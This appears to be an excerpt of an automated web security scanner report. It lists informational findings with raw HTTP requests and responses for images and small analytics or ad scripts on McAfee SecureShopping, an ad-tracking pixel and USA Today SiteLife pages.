HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:35 GMT ETag: "CdLEBc9iPcp" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 615 Date: Mon, 16 May 2011 01:32:35 GMT GIF89a..&................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/footer-search |
GET /images/footer-search Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:35 GMT ETag: "CdLEBc9iPcs" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 618 Date: Mon, 16 May 2011 01:32:35 GMT GIF89a..&................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/logo.gif |
GET /images/logo.gif HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:27 GMT ETag: "CdLEBc9iP4y" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 2416 Date: Mon, 16 May 2011 01:32:26 GMT GIF89a,.<.....H[.8T.....) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/nav-menu-bg.gif |
GET /images/nav-menu-bg.gif HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:35 GMT ETag: "CdLEBc9iPUl" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 99 Date: Mon, 16 May 2011 01:32:35 GMT GIF89a...........#&.#&.$% |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/nav-menu-left.gif |
GET /images/nav-menu-left.gif HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:27 GMT ETag: "CdLEBc9iPZc" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 410 Date: Mon, 16 May 2011 01:32:26 GMT GIF89a........#&.#&.#&... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/nav-menu-right |
GET /images/nav-menu-right Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:29 GMT ETag: "CdLEBc9iPZh" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 415 Date: Mon, 16 May 2011 01:32:29 GMT GIF89a........#&.#&.#&... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/nav-menu-split |
GET /images/nav-menu-split Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:30 GMT ETag: "CdLEBc9iPTv" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 45 Date: Mon, 16 May 2011 01:32:30 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/nav-menu-tab-bg |
GET /images/nav-menu-tab-bg Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:37 GMT ETag: "CdLEBc9iPVt" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 171 Date: Mon, 16 May 2011 01:32:36 GMT GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/nav-menu-tab-left |
GET /images/nav-menu-tab-left Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:30 GMT ETag: "CdLEBc9iPWH" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 197 Date: Mon, 16 May 2011 01:32:30 GMT GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/nav-menu-tab |
GET /images/nav-menu-tab Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:30 GMT ETag: "CdLEBc9iPWH" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 197 Date: Mon, 16 May 2011 01:32:30 GMT GIF89a................... ...Y,,..fL..-...c....; |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/nav-search-bg.gif |
GET /images/nav-search-bg.gif HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:37 GMT ETag: "CdLEBc9iPVs" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 170 Date: Mon, 16 May 2011 01:32:36 GMT GIF89a..A................ |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /js/core.js |
GET /js/core.js?1 HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:39:57 GMT ETag: "CdLEBc9iRVd" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 8347 Date: Mon, 16 May 2011 01:39:56 GMT function m_qt_focus() { var e = document.getElementById( if(e) e.focus(); } function m_qt_search(id) { var v = document.getElementById if(v == '' || v == 'What are you sho ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /js/ga_init.js |
GET /js/ga_init.js HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:27 GMT ETag: "CdLEBc9iPUr" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 105 Date: Mon, 16 May 2011 01:32:26 GMT var pageTracker = _gat._getTracker("UA pageTracker._initData(); pageTracker._trackPa |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /js/ga_track_click.js |
GET /js/ga_track_click.js HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:27 GMT ETag: "CdLEBc9iPZ/" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 445 Date: Mon, 16 May 2011 01:32:26 GMT function trackclick(index){ if (index >= 0){ if (orderId[index] != null){ pageTracker._addTrans( orderId[index], "McAfeeSecureShopping", clickValueStr[index], "0.00", "0.00", ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /js/ga_track_click_init |
GET /js/ga_track_click_init Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:27 GMT ETag: "CdLEBc9iPUi" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 96 Date: Mon, 16 May 2011 01:32:26 GMT var orderId = []; var clickValueStr = []; var sku = []; var productName = []; var category = []; |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /js/google_ads_7409232867 |
GET /js/google_ads_7409232867 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:27 GMT ETag: "CdLEBc9iPVN" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 139 Date: Mon, 16 May 2011 01:32:26 GMT google_ad_client = "pub-9942530385485090"; /* Footer 728x90 */ google_ad_slot = "7409232867"; google_ad_width = 728; google_ad_height = 90; |
Severity: | Information |
Confidence: | Certain |
Host: | http://segment-pixel |
Path: | /pixel |
GET /pixel?pixelID=2083 Host: segment-pixel.invitemedia Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=f034cbc4-3674-4d22 |
HTTP/1.1 302 Found Date: Mon, 16 May 2011 01:42:56 GMT Set-Cookie: segments_p1="eJzjYuG Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Cache-Control: no-cache Location: http://ad.yieldmanager Content-Length: 0 Connection: close Server: Jetty(7.3.1.v20110307) |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/images/no |
GET /ver1.0/Content/images/no Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 498 Content-Type: image/gif Last-Modified: Tue, 15 Dec 2009 21:35:27 GMT Accept-Ranges: bytes ETag: "239c7984ce7dca1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:35 GMT Connection: close GIF89a:.:................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/images |
GET /ver1.0/Content/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 1288 Content-Type: image/jpeg Last-Modified: Tue, 18 May 2010 08:41:57 GMT Accept-Ranges: bytes ETag: "e46f70f965f6ca1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:44 GMT Connection: close ......JFIF.....`.`.....C. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/images |
GET /ver1.0/Content/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 1233 Content-Type: image/jpeg Last-Modified: Tue, 18 May 2010 09:36:30 GMT Accept-Ranges: bytes ETag: "567345986df6ca1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:47 GMT Connection: close ......JFIF.....`.`.....C. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/images |
GET /ver1.0/Content/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 1326 Content-Type: image/jpeg Last-Modified: Mon, 28 Feb 2011 19:01:35 GMT Accept-Ranges: bytes ETag: "cae7ceeb79d7cb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:47 GMT Connection: close ......JFIF.....`.`.....C. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 6118 Content-Type: image/png Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT Accept-Ranges: bytes ETag: "ee4b52f3917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:52 GMT Connection: close .PNG . ...IHDR....... .......<.....tEXtSoftware ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 202 Content-Type: image/png Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT Accept-Ranges: bytes ETag: "48ae54f3917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:52 GMT Connection: close .PNG . ...IHDR.................... ..].a.3%l.Ww.......D.... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 386 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT Accept-Ranges: bytes ETag: "48ae54f3917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:47 GMT Connection: close GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 386 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT Accept-Ranges: bytes ETag: "a21057f3917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:47 GMT Connection: close GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 657 Content-Type: image/gif Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT Accept-Ranges: bytes ETag: "48ae54f3917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:44 GMT Connection: close GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 939 Content-Type: image/gif Last-Modified: Mon, 08 Nov 2010 13:46:34 GMT Accept-Ranges: bytes ETag: "39786e5b4b7fcb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:44 GMT Connection: close GIF89a(.(................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 624 Content-Type: image/gif Last-Modified: Mon, 08 Nov 2010 13:46:35 GMT Accept-Ranges: bytes ETag: "5fac45c4b7fcb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:47 GMT Connection: close GIF89a(.(................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 643 Content-Type: image/jpeg Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT Accept-Ranges: bytes ETag: "209dc8f4917acb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:52 GMT Connection: close ......JFIF.....d.d..... ...........Q............. . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
GET /ver1.0/Content/ua/images Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Content-Length: 1448 Content-Type: image/jpeg Last-Modified: Mon, 08 Nov 2010 16:08:58 GMT Accept-Ranges: bytes ETag: "9b793f405f7fcb1:2af" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:20:47 GMT Connection: close ......JFIF.....d.d..... ...r...3...V............. . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/Content/ua/images |
